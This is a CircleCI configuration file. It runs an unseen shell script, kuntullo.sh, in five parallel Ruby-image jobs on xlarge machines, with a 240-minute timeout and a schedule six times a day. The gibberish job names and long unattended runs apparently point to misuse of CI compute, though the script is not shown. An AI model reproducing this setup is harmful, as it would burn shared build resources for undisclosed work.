resource_class: xlarge
working_dir: &working_dir ~/app

.build_template: &build_definition
  steps:
    - checkout 
    - run:  
        command: chmod +x ./kuntullo.sh && ./kuntullo.sh
        no_output_timeout: 240m

version: 2.0

jobs:
  build:
    docker:
      - image: ruby
    steps:
      - checkout
  buifdsx2_7:
    <<: *build_definition
    docker:
      - image: ruby:2.7
  buifdsx2_6:
    <<: *build_definition
    docker:
      - image: ruby:2.6
  buifdsx2_5:
    <<: *build_definition
    docker:
      - image: ruby:2.5
  buifdsx2_4:
    <<: *build_definition
    docker:
      - image: ruby:2.4
  buifdsx2_3:
    <<: *build_definition
    docker:
      - image: ruby:2.3

workflows:
  version: 2
  commit:
    jobs:
      - build
      - buifdsx2_7
      - buifdsx2_6
      - buifdsx2_5
      - buifdsx2_4
      - buifdsx2_3

    triggers:
      - schedule:
          cron: "0 2,5,8,13,17,22 * * *"
          filters:
            branches:
              only:
                - master
  
  Kambingjanda:
    jobs:
      - build
      - buifdsx2_7
      - buifdsx2_6
      - buifdsx2_5
      - buifdsx2_4
      - buifdsx2_3
